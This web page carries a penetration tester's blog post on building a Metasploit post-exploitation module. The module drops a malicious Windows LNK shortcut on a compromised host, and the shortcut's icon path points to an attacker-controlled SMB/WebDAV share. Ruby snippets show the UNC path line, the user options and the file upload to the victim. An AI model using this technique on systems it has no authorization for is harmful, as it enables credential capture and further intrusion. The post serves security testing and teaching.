<!DOCTYPE html>
<html lang="en">

<head>
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta name="description" content="">
  <meta name="generator" content="Hugo 0.15" />

  <title>Developing the LNK Metasploit post module with Mona &middot; Room362</title>

  
  
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/pure/0.6.0/pure-min.css">

  <!--[if lte IE 8]>
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/pure/0.6.0/grids-responsive-old-ie-min.css">
  <![endif]-->
  <!--[if gt IE 8]><!-->
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/pure/0.6.0/grids-responsive-min.css">
  <!--<![endif]-->

  <!--[if lte IE 8]>
  <link rel="stylesheet" href="/css/side-menu-old-ie.css">
  <![endif]-->
  <!--[if gt IE 8]><!-->
  <link rel="stylesheet" href="/css/side-menu.css">
  <!--<![endif]-->

  <link rel="stylesheet" href="/css/blackburn.css">

  
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css">

  
  <link href="https://fonts.googleapis.com/css?family=Raleway" rel="stylesheet" type="text/css">

  
  <link rel="alternate" type="application/rss+xml" title="Room362" href="http://room362.com/index.xml" />

  
  <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.1.0/styles/androidstudio.min.css">
  <script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.1.0/highlight.min.js"></script>
  <script>hljs.initHighlightingOnLoad();</script>
  

  <link rel="shortcut icon" href="http://room362.com/img/favicon.ico" type="image/x-icon" />

</head>


<body>
<div id="layout">

  
<a href="#menu" id="menuLink" class="menu-link">
  
  <span></span>
</a>
<div id="menu">

  

  <div class="pure-menu">
    <ul class="pure-menu-list">
      
      
        <li class="pure-menu-item">
          <a class="pure-menu-link" href="/"><i class='fa fa-home fa-fw'></i>Home</a>
      
        </li>
      
      
        <li class="pure-menu-item">
          <a class="pure-menu-link" href="/brandon/"><i class='fa fa-users fa-fw'></i>Brandon</a>
      
        </li>
      
      
        <li class="pure-menu-item">
          <a class="pure-menu-link" href="/post/"><i class='fa fa-list fa-fw'></i>Posts</a>
      
        </li>
      
      
        <li class="pure-menu-item">
          <a class="pure-menu-link" href="/about/"><i class='fa fa-user fa-fw'></i>About</a>
      
        </li>
      
    </ul>
  </div>

  <div class="pure-menu social">
  <ul class="pure-menu-list">

    <li class="pure-menu-item">
      <a class="pure-menu-link" href="http://room362.com/index.xml"><i class="fa fa-rss fa-fw"></i>RSS</a>
    </li>

    

    
    <li class="pure-menu-item">
      <a class="pure-menu-link" href="https://twitter.com/mubix" target="_blank"><i class="fa fa-twitter fa-fw"></i>Twitter</a>
    </li>
    

    
    <li class="pure-menu-item">
      <a class="pure-menu-link" href="https://facebook.com/mubix" target="_blank"><i class="fa fa-facebook fa-fw"></i>Facebook</a>
    </li>
    

    
    <li class="pure-menu-item">
      <a class="pure-menu-link" href="https://plus.google.com/+mubix" target="_blank"><i class="fa fa-google-plus-square fa-fw"></i>Google+</a>
    </li>
    

    

    

    
    <li class="pure-menu-item">
      <a class="pure-menu-link" href="https://instagram.com/mubix" target="_blank"><i class="fa fa-instagram fa-fw"></i>Instagram</a>
    </li>
    

    
    <li class="pure-menu-item">
      <a class="pure-menu-link" href="https://flickr.com/photos/mubix" target="_blank"><i class="fa fa-flickr fa-fw"></i>Flickr</a>
    </li>
    

    

    
    <li class="pure-menu-item">
      <a class="pure-menu-link" href="https://youtube.com/user/hak5" target="_blank"><i class="fa fa-youtube fa-fw"></i>YouTube</a>
    </li>
    

    
    <li class="pure-menu-item">
      <a class="pure-menu-link" href="https://vimeo.com/mubix" target="_blank"><i class="fa fa-vimeo fa-fw"></i>Vimeo</a>
    </li>
    

    

    
    <li class="pure-menu-item">
      <a class="pure-menu-link" href="http://slideshare.net/mubix" target="_blank"><i class="fa fa-slideshare fa-fw"></i>SlideShare</a>
    </li>
    

    

    
    <li class="pure-menu-item">
      <a class="pure-menu-link" href="https://linkedin.com/in/mubix" target="_blank"><i class="fa fa-linkedin fa-fw"></i>LinkedIn</a>
    </li>
    

    

    

    
    <li class="pure-menu-item">
      <a class="pure-menu-link" href="https://reddit.com/user/mubix" target="_blank"><i class="fa fa-reddit fa-fw"></i>Reddit</a>
    </li>
    

    

    
    <li class="pure-menu-item">
      <a class="pure-menu-link" href="https://github.com/mubix" target="_blank"><i class="fa fa-github-alt fa-fw"></i>GitHub</a>
    </li>
    

    
    <li class="pure-menu-item">
      <a class="pure-menu-link" href="https:////bitbucket.org/mubix" target="_blank"><i class="fa fa-bitbucket fa-fw"></i>Bitbucket</a>
    </li>
    

    

  </ul>
</div>

  <div class="pure-g">
  <div class="small-print pure-u-1 pure-u-md-1-1">
    <small>&copy; 2016. All rights reserved.</small>
  </div>
  <div class="small-print pure-u-1 pure-u-md-1-1">
    <small>Built with&nbsp;<a href="https://gohugo.io/" target="_blank">Hugo</a></small>
    <small>Theme&nbsp;<a href="https://github.com/yoshiharuyamashita/blackburn" target="_blank">Blackburn</a></small>
  </div>
</div>

</div>


  <div id="main">


<div class="header">
  <h1>Developing the LNK Metasploit post module with Mona</h1>
  <h2></h2>
</div>
<div class="content">
  <p>I have been using the LNK trick I talked about in my <a href="/blog/2012/02/11/ms08_068-ms10_046-fun-until-2018">last post</a> for a while, but always needing a Windows machine to create the LNK file. When I decided to write a post about it, I wanted to put the stipulation for myself that I would finally develop a way to get it done with out having to lug around a VM or spin one up every time I needed to change it&rsquo;s target.</p>

<p>Of course the first place I looked was Meterpreter&rsquo;s Railgun (direct windows API calling within meterpreter). But to do it with Railgun I would have to develop a way to <a href="http://msdn.microsoft.com/en-us/library/aa969393.aspx">work with COM objects</a>. Something that I don’t believe is built into Railgun (yet… /me nudges chao-mu). The second place I looked was to see if I could just build an LNK file from scratch <a href="http://msdn.microsoft.com/en-us/library/dd871305(PROT.10">using the spec</a>.aspx).. ya…. that didn’t go so..*zzzZZZzzzzzzzZzzz</p>

<p>Enter <a href="http://redmine.corelan.be/projects/mona">mona</a>, the <a href="http://www.corelan.be/">Corelan Team’s</a> exploit development plugin for <a href="http://immunityinc.com/products-immdbg.shtml">Immunity Debugger</a>. Now, usually it is used exactly as intended, as an exploit development tool, and I guess you could consider my use of it as an extension of that as well. But, anyways, one of Mona’s many and probably one of the least well known functions is ‘header’. What this function does is simply output a ruby version of the file broken into ASCII and binary parts. That’ll make much more sense in a sec, back to the problem. I need to recreate a file in a way I can manipulate it on the fly with enough agility to be useful to others in a post module without using the spec or Railgun to assist.</p>

<p>We start off with the maliciously altered LNK file, and an up to date version of Immunity and mona:</p>

<p><img src="/images/postimages/201202_mona_1.png" alt="" /></p>

<p>I copied the shortcut file to the C drive so I didn’t have to specify a huge path in the mona command, and issued:</p>

<p><code>“!mona header C:\autoexec.lnk”</code></p>

<p><img src="/images/postimages/201202_mona_2.png" alt="" /></p>

<p>As you can see, mona breaks up the binary into ‘understandable’ portions, so if it sees a string is keeps it together, if it sees unicode, it actually uses the Rex ruby libraries. You can try it yourself and scroll through the results but when I saw:</p>

<pre><code class="language-ruby">header &lt;&lt; Rex::Text.to_unicode(&quot;C:\%\\\\192.168.100.100\\w00t\\bogusimage.png`&quot;)
</code></pre>

<p>I knew I was golden. Quick note: pay close attention when you edit the output of this command in a text editor, initially I didn’t notice the ‘tick’ ( ` ) at the end of the share string and it cause me a lot of grief.</p>

<p>Cool, so I have a bit of ruby that puts the contents of my LNK file into a ruby variable. Now what?</p>

<p>Now I have 3 challenges:</p>

<ol>
<li>It needs to have a user defined target IP at the very least and anything else I work into a variable option for the user.</li>
<li>It needs to upload the file to the exploited system.</li>
<li>It needs to be up to code on the Metasploit coding standards</li>
</ol>

<p>Changing the line I found for the share name into this:</p>

<pre><code class="language-ruby">lnk &lt;&lt; Rex::Text.to_unicode(&quot;\\\\#{datastore['LHOST']}\\#{datastore['SHARENAME']}\\#{datastore['ICONFILENAME']}`&quot;)
</code></pre>

<p>‘datastore’ is used as the container for variable set by default or by the user using the module. Adding those option for the user is pretty easy. You just add the following to the ‘register_options’ section of your module:</p>

<pre><code class="language-ruby">OptAddressRange.new(&quot;LHOST&quot;, [ true, &quot;Host listening for incoming SMB/WebDAV traffic&quot;, nil]),
OptString.new(&quot;SHARENAME&quot;, [ true, &quot;Share name on LHOST&quot;, &quot;share1&quot;]),       
OptString.new(&quot;ICONFILENAME&quot;, [ true, &quot;File name on LHOST's share&quot;, &quot;icon.png&quot;])
</code></pre>

<p>OptAddressRange is used instead of a string because it has a bit of validation that you are actually using something that either resembles an IP address or a hostname.</p>

<p>Problem 1 solved. Problem 2 was just as easy, the following line:</p>

<pre><code>file = client.fs.file.new(datastore['LNKFILENAME'], 'wb')
</code></pre>

<p>creates a new file on the victim, and ‘file.write(lnk)’ writes the binary contents of the ‘lnk’ variable into it.</p>

<p>Problem 3 is much more tricky, but here is the path to wisdom:</p>

<pre><code>ruby /metasploit-directory/tools/msftidy.rb /path/to/my/module/evil.rb
</code></pre>

<p>Hope this helps spur people into trying their hand at developing some modules of their own.</p>

</div>

</div>
</div>
<script src="http://room362.com/js/ui.js"></script>




</body>
</html>

